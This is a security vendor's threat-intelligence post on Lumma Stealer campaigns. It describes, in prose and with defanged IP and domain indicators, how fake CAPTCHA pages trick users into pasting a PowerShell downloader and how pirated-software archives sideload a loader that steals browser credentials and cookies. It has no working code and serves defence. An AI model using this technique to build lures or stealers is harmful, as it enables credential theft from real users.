Notes from the Field • 10 MIN READ
Resurgence in Lumma Stealer Malware Campaigns – Notes from the Field
by Ranjit Patil, Eleanor Barlow • Oct 2024
‘Lumma Stealer’, also known as ‘LummaC2 Stealer’ and just ‘Lumma’, is a form of Russian-based malware sold as a Malware-as-a-Service that has been available on dark web forums since 2022. This particular form of malware has been observed targeting multiple industries via browser extensions and two-factor authentication processes.
‘At SecurityHQ, we have observed Lumma Stealer’s global impact against multiple industries, including IT, media, and manufacturing, where users were compromised by this campaign. Lumma Stealer is known to exfiltrate host details and browser data from the compromised machines, and we have seen some “.shop” domains spreading these malware files.’- Ranjit Patil, SME-Malware Analysis, SecurityHQ
What SecurityHQ Analysts Observed
SecurityHQ has observed two new campaigns to distribute the Lumma Stealer malware, a potent information-stealing threat. These campaigns utilize deceptive tactics, including phishing sites and pirated software, to infect victims’ systems and exfiltrate sensitive data.
1. Fake CAPTCHA Pages
The first method involves the use of fake CAPTCHA pages hosted on phishing sites, often supported by Content Delivery Networks. These sites trick users into performing keyboard commands, such as “Windows + R” and “CTRL + V” which unknowingly execute a PowerShell script.
The website contains a Java script that copies the Powershell script, and when pasted executes it as a script. This script then downloads and installs the Lumma Stealer malware onto the victim’s device. Once the second-stage payload is downloaded, the malware is executed from a ZIP folder, allowing the attacker to steal sensitive information.
Technical Analysis of Fake CAPTCHA Pages
Adversaries often host phishing websites on various platforms, including those that utilize Content Delivery Networks (CDNs). These malicious sites typically present users with a fake CAPTCHA page.
The sites will force users to go through what looks like a CAPTCHA test. The fake CAPTCHA is designed to trick the user into believing they are completing a standard verification test to prove they are human and not a bot.
What to Look For
The fake CAPTCHA test asks the user to perform several keyboard commands that look harmless at first glance. This includes asking the user to press “Windows + R,” which will pull up the run dialog box, and is a way to launch programs. The next step is to press “CTRL + V” and then enter. If executed quickly without careful attention, these commands can result in a PowerShell script being pasted into the Windows Run dialog. This script, when run, downloads and installs the Lumma Stealer malware onto the user’s system.
The Powershell script connects to the remote server to download a Lumma Stealerzip folder and executes the setup.
2. Pirated PC Software Sites
The second campaign leverages pirated PC software sites to spread malicious password-protected ZIP files.
Users are lured into downloading these files, believing they contain free copies of commercial software. Upon extraction and execution of the malicious “Setup.exe” a Hijack Loader is injected into a Windows binary, initiating the download and execution of the Lumma Stealer.
The malware gathers information such as browser login credentials, stored passwords, and cookies, which are then sent to a Command-and-Control server. It also establishes persistence by creating scheduled tasks and registry entries.
Technical Analysis
Adversaries trick users into downloading malicious password-protected archive files that are free copies of commercial software. These copies are stored on the file share platform. The file is a password-protected archive, with the password provided in the file name.
The extracted Zip file contains multiple Dynamic Link Libraries (DLLs) which are used for the DLL Sideloading attack. Initial execution will start when the user extracts the ZIP file and executes the setup.
Upon execution, a malicious loader is injected into a Windows Binary. Execution of the Hijack Loader results in the download and execution of a binary from the Temp folder which, in turn, performs credential access and maintains sustained network connectivity to the C2 server.
After execution, the device gathers information like the computer’s name and language information.
Next, it accesses internal files of Web browsers (Chrome and Edge) and other browsers installed on the device to collect information like login data, stored passwords, and cookies.
All collected data is sent to the Command-and-Control Server.
IP Addresses:
- 184[.]30[.]21[.]171
- 104[.]26[.]2[.]16
- 188[.]114[.]96[.]3
Domains/URLs:
- Predatowpmn[.]shop
- Fileworld[.]shop
- pang-scrooge-carnage[.]shop
- Preachstrwnwjw[.]shop
- Complainnykso[.]shop
Next Steps to Safeguard Against Lumma
- Be cautious of suspicious websites, especially those asking for unusual actions like keyboard commands.
- Avoid downloading software from untrusted sources, as they often contain hidden malware.
- Monitor the network for the presence of the mentioned Indicator of Compromise (IOC).
- Segment Networks: By dividing the computer network into smaller more isolated segments or subnetworks to limit or block lateral movement.
- Deploy EDR: Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
- Strengthen Email Security: Implement advanced email filtering and security measures to prevent phishing emails and malicious attachments from reaching your employees’ inboxes.
- Educate Employees: Raise staff awareness about the potential risks associated with opening suspicious emails or documents in general.
For more information about this Malware, how it works, and how to protect against it, contact an expert, here.